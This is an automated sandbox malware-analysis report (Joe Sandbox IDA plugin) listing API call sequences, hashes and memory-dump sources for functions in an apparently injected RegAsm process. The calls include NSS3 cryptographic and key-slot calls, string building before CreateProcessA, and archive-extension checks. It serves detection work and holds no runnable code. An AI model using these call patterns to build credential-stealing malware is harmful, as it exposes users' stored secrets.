PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C192E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C192E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C164F1C,?,-00000001,00000000,?), ref: 6C192E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C164F1C,?,-00000001,00000000), ref: 6C192E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C192EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C192EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C192EF8
PR_Unlock.NSS3(?), ref: 6C192F62
TlsGetValue.KERNEL32 ref: 6C192F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6C192F9E
PR_Unlock.NSS3(?), ref: 6C192FCA
TlsGetValue.KERNEL32 ref: 6C19301A
EnterCriticalSection.KERNEL32(?), ref: 6C19302E
PR_Unlock.NSS3(?), ref: 6C193066
PR_SetError.NSS3(00000000,00000000), ref: 6C193085
PR_Unlock.NSS3(?), ref: 6C1930EC
TlsGetValue.KERNEL32 ref: 6C19310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6C193124
PR_Unlock.NSS3(?), ref: 6C19314C

Part of subcall function 6C179180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C1A379E,?,6C179568,00000000,?,6C1A379E,?,00000001,?), ref: 6C17918D
Part of subcall function 6C179180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C1A379E,?,6C179568,00000000,?,6C1A379E,?,00000001,?), ref: 6C1791A0

Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407AD
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407CD
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407D6
Part of subcall function 6C1407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C0D204A), ref: 6C1407E4
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,6C0D204A), ref: 6C140864
Part of subcall function 6C1407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C140880
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,6C0D204A), ref: 6C1408CB
Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(?,?,6C0D204A), ref: 6C1408D7
Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(?,?,6C0D204A), ref: 6C1408FB

PR_SetError.NSS3(00000000,00000000), ref: 6C19316D

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: 0fc310d8adf10cf583176642b65a52ec8df02bf1bbafd8d043f69ac694f7b161
Instruction ID: 4e6a59b5d7b2be999deaa0e8e43c770a23e0018c58914b426c5a8ba2bd36c5f4
Opcode Fuzzy Hash: 0fc310d8adf10cf583176642b65a52ec8df02bf1bbafd8d043f69ac694f7b161
Instruction Fuzzy Hash: 75F19EB1D002099FDF00DFA8D888BAEBBB4BF19318F544165EC05A7751EB31E996CB91

Function 6C196CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C196910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C196943
Part of subcall function 6C196910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C196957
Part of subcall function 6C196910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C196972
Part of subcall function 6C196910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C196983
Part of subcall function 6C196910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C1969AA
Part of subcall function 6C196910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C1969BE
Part of subcall function 6C196910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C1969D2
Part of subcall function 6C196910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C1969DF
Part of subcall function 6C196910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C196A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C196D8C
free.MOZGLUE(00000000), ref: 6C196DC5
free.MOZGLUE(?), ref: 6C196DD6
free.MOZGLUE(?), ref: 6C196DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C196E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C196E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C196E72
free.MOZGLUE(?), ref: 6C196EA7
free.MOZGLUE(?), ref: 6C196EC4
free.MOZGLUE(?), ref: 6C196ED5
free.MOZGLUE(00000000), ref: 6C196EE3
free.MOZGLUE(?), ref: 6C196EF4
free.MOZGLUE(?), ref: 6C196F08
free.MOZGLUE(00000000), ref: 6C196F35
free.MOZGLUE(?), ref: 6C196F44
free.MOZGLUE(?), ref: 6C196F5B
free.MOZGLUE(00000000), ref: 6C196F65

Part of subcall function 6C196C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C19781D,00000000,6C18BE2C,?,6C196B1D,?,?,?,?,00000000,00000000,6C19781D), ref: 6C196C40
Part of subcall function 6C196C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C19781D,?,6C18BE2C,?), ref: 6C196C58
Part of subcall function 6C196C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C19781D), ref: 6C196C6F
Part of subcall function 6C196C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C196C84
Part of subcall function 6C196C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C196C96
Part of subcall function 6C196C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C196CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C196F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C196FC5
PK11_GetInternalKeySlot.NSS3 ref: 6C196FF4

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID:
API String ID: 1304971872-0
Opcode ID: c9c3fd50d09eeae3aea295b074bd3d5bdad4887c86725223f159ae4b6929ce5a
Instruction ID: e8ab78cc862973a5f0f57bb99cfa6f1e1d0416cf4f32ff3cbd0aa176535fc727
Opcode Fuzzy Hash: c9c3fd50d09eeae3aea295b074bd3d5bdad4887c86725223f159ae4b6929ce5a
Instruction Fuzzy Hash: 25B149B0E0120D9FEF41DFA5D884BAEBBB8AF15248F140025E815E7A41E735E954CBF1

Function 6C194C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C194C4C
EnterCriticalSection.KERNEL32(?), ref: 6C194C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C194CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C194CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C194CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C194D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C194D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C194DB7

Part of subcall function 6C1FDD70: TlsGetValue.KERNEL32 ref: 6C1FDD8C
Part of subcall function 6C1FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C1FDDB4

Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407AD
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407CD
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407D6
Part of subcall function 6C1407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C0D204A), ref: 6C1407E4
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,6C0D204A), ref: 6C140864
Part of subcall function 6C1407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C140880
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,6C0D204A), ref: 6C1408CB
Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(?,?,6C0D204A), ref: 6C1408D7
Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(?,?,6C0D204A), ref: 6C1408FB

TlsGetValue.KERNEL32 ref: 6C194DD7
EnterCriticalSection.KERNEL32(?), ref: 6C194DEC
PR_Unlock.NSS3(?), ref: 6C194E1B
PR_SetError.NSS3(00000000,00000000), ref: 6C194E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C194E5A
PR_SetError.NSS3(00000000,00000000), ref: 6C194E71
free.MOZGLUE(00000000), ref: 6C194E7A
PR_Unlock.NSS3(?), ref: 6C194EA2
TlsGetValue.KERNEL32 ref: 6C194EC1
EnterCriticalSection.KERNEL32(?), ref: 6C194ED6
PR_Unlock.NSS3(?), ref: 6C194F01
free.MOZGLUE(00000000), ref: 6C194F2A

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: e41dfc7d53a5d3e0b0f8a4add31612e9a5cf285b6de0c1aa4b02b3cf7e112ccc
Instruction ID: 1d8c77a8fd500d19eb968aef0849f9298e7a5b67ec930f735d51cbfba729e511
Opcode Fuzzy Hash: e41dfc7d53a5d3e0b0f8a4add31612e9a5cf285b6de0c1aa4b02b3cf7e112ccc
Instruction Fuzzy Hash: 73B12375A002069FDF00EF68D888BAA77B4FF19318F054124ED2597B81EB35E965CBE1

Function 6C15C4B0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 247COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C15C4D5

Part of subcall function 6C1ABE30: SECOID_FindOID_Util.NSS3(6C16311B,00000000,?,6C16311B,?), ref: 6C1ABE44

NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C15C516
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C15C530
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C15C54E
NSS_GetAlgorithmPolicy.NSS3(00000000,00000000), ref: 6C15C5CB
VFY_VerifyDataWithAlgorithmID.NSS3(00000002,?,?,?,?,?,?), ref: 6C15C712
NSS_GetAlgorithmPolicy.NSS3(?,?), ref: 6C15C725
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C15C742
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C15C751
PL_FinishArenaPool.NSS3(?), ref: 6C15C77A
NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C15C78F
NSS_GetAlgorithmPolicy.NSS3(?,00000000), ref: 6C15C7A9

Strings

security, xrefs: 6C15C63F

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Algorithm$Policy$Util$ErrorTag_$ArenaDataFindFinishPoolVerifyWith
String ID: security
API String ID: 1085474831-3315324353
Opcode ID: eb21630a4ce195393d23539853d6dd3e0a90be18b88da44cd2fe94bcbc448f4f
Instruction ID: 7730ea468dcc5f8403d433b2b395de749b6c3d346e9b92b3c6171dd057db5230
Opcode Fuzzy Hash: eb21630a4ce195393d23539853d6dd3e0a90be18b88da44cd2fe94bcbc448f4f
Instruction Fuzzy Hash: 868119F1D011089FEB00EE94DCA0BEE7774DF2930CF944125E925A6F91E731DA69CA92

Function 6C1C4500 Relevance: 28.8, APIs: 19, Instructions: 319threadCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(6C1C3803,?,6C1C3817,00000000), ref: 6C1C450E

Part of subcall function 6C1B07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C158298,?,?,?,6C14FCE5,?), ref: 6C1B07BF
Part of subcall function 6C1B07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C1B07E6
Part of subcall function 6C1B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C1B081B
Part of subcall function 6C1B07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C1B0825

PR_SetError.NSS3(FFFFE005,00000000,?,6C1C3817,00000000), ref: 6C1C4550
SECOID_FindOIDByTag_Util.NSS3(00000004,00000000), ref: 6C1C45B5
SECOID_FindOIDByTag_Util.NSS3(000000BF,00000000), ref: 6C1C4709
SECOID_GetAlgorithmTag_Util.NSS3(?,00000000), ref: 6C1C4727
SECOID_GetAlgorithmTag_Util.NSS3(?,?,00000000), ref: 6C1C473B
PORT_NewArena_Util.NSS3(00000400,?,?,?,?,?,?,?,00000000), ref: 6C1C4801
SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C282DA0,?,?,?,?,?,?,?,?,00000000), ref: 6C1C482E
PR_GetCurrentThread.NSS3 ref: 6C1C48F3
PR_SetError.NSS3(FFFFE02F,00000000), ref: 6C1C4923
PR_SetError.NSS3(FFFFE02F,00000000), ref: 6C1C4937
SECKEY_DestroyPublicKey.NSS3(?,?,?,00000000), ref: 6C1C494E
PR_SetError.NSS3(FFFFE02F,00000000,?,?,?,00000000), ref: 6C1C4963
PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C1C4984
VFY_VerifyDataWithAlgorithmID.NSS3(?,?,?,6C1C21C2,?,?,?), ref: 6C1C499C
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C1C49B5
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,00000000), ref: 6C1C49C5
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C1C49DC
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C1C49E9

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Error$Arena_Tag_$AlgorithmFindFree$DestroyHashLookupPublicTable$ConstCurrentDataEncodeItem_ThreadVerifyWith
String ID:
API String ID: 3698863438-0
Opcode ID: 7864fa819fb3a459e777d4318e92d5ee5f30236ad7ffd6d01fba027bf19431fa
Instruction ID: 6aa67c86d05d51afe4404d08537eebaedb393e313eec9e84e4c521d783c946eb
Opcode Fuzzy Hash: 7864fa819fb3a459e777d4318e92d5ee5f30236ad7ffd6d01fba027bf19431fa
Instruction Fuzzy Hash: E4A1F5B5F092149BFF008AA5DC80BBE3675AB3931CF244124FA05A7B81E739D855CB97

Function 0041260C Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 177stringprocessCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416FD4,004366CB,?,?,?,?,004184E8), ref: 0041050D

_memset.LIBCMT ref: 0041274C
lstrcatA.KERNEL32(?,?,?,?,?), ref: 00412764
lstrcatA.KERNEL32(?,00436694), ref: 00412772
lstrcatA.KERNEL32(?,dea7c01007a657ba0c601c941632f140), ref: 00412780
lstrcatA.KERNEL32(?,00436698), ref: 0041278E
lstrcatA.KERNEL32(?,?), ref: 0041279A
lstrcatA.KERNEL32(?,0043669C), ref: 004127A8
lstrcatA.KERNEL32(?,?), ref: 004127B4
lstrcatA.KERNEL32(?,004366A0), ref: 004127C2
lstrcatA.KERNEL32(?,?), ref: 004127CE
lstrcatA.KERNEL32(?,004366A4), ref: 004127DC
lstrlenA.KERNEL32(?), ref: 004127E5
_memset.LIBCMT ref: 0041281B
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,004366A8,?), ref: 00412888

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,004170CD,004366CF,004366CE,?,?,?,?,004184E8), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,004170CD,004366CF,004366CE,?,?,?,?,004184E8), ref: 00410581

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366FB,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,00417542,004366F5), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FF5,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417013,00436C0C,00000000,004366CB,?,?,?,?,004184E8), ref: 004105BD

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,0041757A), ref: 00410538

Part of subcall function 00412446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,004149E5), ref: 00412460

Strings

dea7c01007a657ba0c601c941632f140, xrefs: 00412774
.exe, xrefs: 0041264F

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$Create_memset$FileProcessSystemTime
String ID: .exe$dea7c01007a657ba0c601c941632f140
API String ID: 4202808623-3314179919
Opcode ID: 21beb21f0cada915623cde6d0ed90ed54d556e43489060683d064beb3c4e0e96
Instruction ID: 4b3d4162ce062bcc179a17e3061810f9897554108fbef6c8472c76724740e822
Opcode Fuzzy Hash: 21beb21f0cada915623cde6d0ed90ed54d556e43489060683d064beb3c4e0e96
Instruction Fuzzy Hash: AA610DB1D4012DABCB21EF65DD46ADE777CEB04308F4104BAB608B3051D678AF898F98

Function 0041B7C9 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,74DE83C0,00000000,0041C4B4,?), ref: 0041B7CE
StrCmpCA.SHLWAPI(74DE83C0,0043613C), ref: 0041B7FC
StrCmpCA.SHLWAPI(74DE83C0,.zip), ref: 0041B80C
StrCmpCA.SHLWAPI(74DE83C0,.zoo), ref: 0041B818
StrCmpCA.SHLWAPI(74DE83C0,.arc), ref: 0041B824
StrCmpCA.SHLWAPI(74DE83C0,.lzh), ref: 0041B830
StrCmpCA.SHLWAPI(74DE83C0,.arj), ref: 0041B83C
StrCmpCA.SHLWAPI(74DE83C0,.gz), ref: 0041B848
StrCmpCA.SHLWAPI(74DE83C0,.tgz), ref: 0041B854

Strings

.arc, xrefs: 0041B81E
.lzh, xrefs: 0041B82A
.zip, xrefs: 0041B806
.gz, xrefs: 0041B842
.arj, xrefs: 0041B836
.zoo, xrefs: 0041B812
.tgz, xrefs: 0041B84E

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
API String ID: 1659193697-51310709
Opcode ID: 54ae333f8b5274885e17379ca82bd682d21753aa1aef1686f1ee84574de7c63d
Instruction ID: 299b021d0ba130eafd5b0d569a3a903f0c889c37c2d2a11336d49a0866da34fa
Opcode Fuzzy Hash: 54ae333f8b5274885e17379ca82bd682d21753aa1aef1686f1ee84574de7c63d
Instruction Fuzzy Hash: 9E015631681727755B2229316D42FBF1D9C8D86FD0725503BE800A2189EB9C9C8355FD

Function 6C158E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C158E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6C158E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C158EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C2818D0,?), ref: 6C158F03
PR_CallOnce.NSS3(6C2B2AA4,6C1B12D0), ref: 6C158F19
PL_FreeArenaPool.NSS3(?), ref: 6C158F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C158F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C158F65
PL_FinishArenaPool.NSS3(?), ref: 6C158FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6C158FFE
PR_CallOnce.NSS3(6C2B2AA4,6C1B12D0), ref: 6C159012
PL_FreeArenaPool.NSS3(?), ref: 6C159024
PL_FinishArenaPool.NSS3(?), ref: 6C15902C
PORT_DestroyCheapArena.NSS3(?), ref: 6C15903E

Strings

security, xrefs: 6C158EE7

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: 9be1d619252334ec6686e6970f6e1d1dd87b1ce356520ddfc297fa95ee785bf6
Instruction ID: aaecd1851c01ca392002bcad25adc8371c9e5efb4810ba4f0f39afc26f42808e
Opcode Fuzzy Hash: 9be1d619252334ec6686e6970f6e1d1dd87b1ce356520ddfc297fa95ee785bf6
Instruction Fuzzy Hash: EC5149F1648300ABF7109A549C45FAB73E8EB9575CF95082EF864A7B80E732D819C763

Function 0041391A Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127stringCOMMON

Download Yara Rule

APIs

